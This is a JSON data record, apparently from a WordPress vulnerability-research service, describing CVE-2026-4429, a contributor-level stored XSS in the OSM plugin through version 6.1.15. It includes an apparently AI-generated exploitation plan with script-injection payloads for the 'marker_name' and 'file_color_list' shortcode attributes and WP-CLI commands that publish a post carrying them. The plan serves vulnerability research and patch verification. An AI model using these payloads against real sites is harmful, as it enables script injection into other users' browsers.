[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_rKV58njlUbGPhaBcyNVSz-kPoLRDB7bmJryrXDzPuM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-4429","osm-authenticated-contributor-stored-cross-site-scripting-via-markername-shortcode-attribute","OSM \u003C= 6.1.15 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'marker_name' Shortcode Attribute","The OSM – OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'marker_name' and 'file_color_list' shortcode attributes of the [osm_map_v3] shortcode in all versions up to and including 6.1.15. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","osm",null,"\u003C=6.1.15","6.1.16","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-08 00:00:00","2026-04-09 02:25:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F65dffde9-2a50-41fe-bc21-3d0915068887?source=api-prod",1,[22,23,24,25],"osm-icon-class.php","osm.php","osm_map_v3\u002Fosm-sc-osm_map_v3.php","readme.txt","researched",false,3,"# Research Plan: CVE-2026-4429 - OSM Stored XSS\n\n## 1. Vulnerability Summary\nThe **OSM – OpenStreetMap** plugin for WordPress (versions \u003C= 6.1.15) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the handling of the `[osm_map_v3]` shortcode, specifically through the `marker_name` and `file_color_list` attributes. Because the plugin fails to sanitize or escape these attributes before rendering them in the page's HTML or JavaScript context, an attacker with at least Contributor-level permissions can inject malicious scripts into posts or pages.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post\u002FPage Editor (standard `wp-admin\u002Fpost.php` or Gutenberg block editor).\n*   **Shortcode:** `[osm_map_v3]`\n*   **Vulnerable Attributes:** `marker_name`, `file_color_list`.\n*   **Authentication Level:** Contributor or higher (any role capable of using shortcodes).\n*   **Vector:** The payload is stored in the `post_content` table and executes whenever the post\u002Fpage is viewed.\n\n## 3. Code Flow\n1.  **Entry Point:** When a post containing `[osm_map_v3]` is rendered, WordPress calls the shortcode handler.\n2.  **Registration:** The shortcode is handled in `osm_map_v3\u002Fosm-sc-osm_map_v3.php`.\n3.  **Attribute Extraction:** \n    *   Line 47: `extract(shortcode_atts(array(... 'file_color_list' => 'NoColor', ... 'marker_name' => 'NoName', ...), $atts));`\n    *   The variables `$marker_name` and `$file_color_list` now hold raw user-provided values.\n4.  **Processing:**\n    *   Line 81: Attributes are passed to the `cOsm_arguments` constructor.\n    *   Line 160: `$default_icon = new cOsm_icon($marker_name);` is called if `marker_size` is not set.\n5.  **Sink:** The variables are subsequently used to build the HTML and JavaScript that initializes the OpenLayers map. In version 6.1.15, these are reflected into the page without calling escaping functions like `esc_attr()` or `esc_js()`.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** vulnerability via a shortcode. It does **not** require a plugin-specific AJAX nonce to exploit. The attacker only needs to be able to save a post.\n*   The \"exploit\" happens during the rendering phase. \n*   To *set up* the exploit, use the `wp-cli` to create a post as a Contributor.\n*   To *trigger* the exploit, navigate to the post URL.\n\n## 5. Exploitation Strategy\n### Step 1: Payload Selection\nWe will test two attributes: `marker_name` and `file_color_list`.\n*   **Payload A (Attribute breakout):** `\">\u003Cscript>alert('XSS_MARKER')\u003C\u002Fscript>`\n*   **Payload B (JS context breakout):** `';alert('XSS_COLOR');\u002F\u002F`\n\n### Step 2: Test Data Setup (via WP-CLI)\nCreate a post as a contributor user containing the malicious shortcode.\n\n```bash\n# 1. Ensure a contributor user exists\nwp user create contributor contributor@example.com --role=contributor --user_pass=password123\n\n# 2. Create a post with the malicious shortcode\nwp post create --post_type=post \\\n               --post_title=\"OSM Map Test\" \\\n               --post_status=publish \\\n               --post_author=$(wp user get contributor --field=ID) \\\n               --post_content='[osm_map_v3 marker_name=\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" file_color_list=\"\\\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>\"]'\n```\n\n### Step 3: Trigger the Exploit\nNavigate to the newly created post in the browser context.\n\n```javascript\n\u002F\u002F PoC Agent: Use browser_navigate to the URL of the created post.\n\u002F\u002F The post ID can be captured from the 'wp post create' output.\n```\n\n## 6. Test Data Setup\n*   **Plugin Status:** OSM v6.1.15 installed and activated.\n*   **User Role:** A user with `edit_posts` capability (Contributor+).\n*   **Content:** A post containing the `[osm_map_v3]` shortcode with payloads in `marker_name` and\u002For `file_color_list`.\n\n## 7. Expected Results\n*   When the post is viewed, the HTML source should contain the unescaped script tags.\n*   The browser should trigger the `alert()` functions.\n*   Inspection of the DOM should show the script injected either into a `data-*` attribute of a `div` (breaking out with `\">`) or within a `\u003Cscript>` block.\n\n## 8. Verification Steps\n1.  **DOM Inspection:** Use `browser_eval` to check for the presence of the injected payload in the rendered page.\n    ```javascript\n    \u002F\u002F Check if the script was rendered\n    const scripts = Array.from(document.getElementsByTagName('script'));\n    const xssFound = scripts.some(s => s.textContent.includes('alert(document.domain)'));\n    return xssFound;\n    ```\n2.  **HTML Source Check:** Use `http_request` to fetch the post HTML and grep for the raw payload to confirm lack of encoding.\n    ```bash\n    # Expected: The response body contains the raw string:\n    # marker_name=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n    ```\n\n## 9. Alternative Approaches\nIf the plugin renders these attributes inside a JSON object passed to `wp_localize_script`, the breakout payload might need to be adjusted:\n*   **JS Object Payload:** `\"},alert(1),{\"a\":\"`\n*   **Broken Attribute Payload:** `marker_name=\"123' onclick='alert(1)'\"`\n\nIf `marker_name` is passed to the `cOsm_icon` class (as seen in line 160 of `osm-sc-osm_map_v3.php`), the vulnerability may manifest when the icon URL is generated in `osm-icon-class.php`. If the icon name is appended to a URL string without sanitization, an XSS via the `src` attribute of an `\u003Cimg>` tag is possible:\n*   **Payload:** `x\" onerror=\"alert(1)\"`","gemini-3-flash-preview","2026-04-17 20:15:29","2026-04-17 20:15:49",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.1.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fosm\u002Ftags\u002F6.1.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fosm.6.1.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fosm\u002Ftags\u002F6.1.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fosm.6.1.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fosm\u002Ftags"]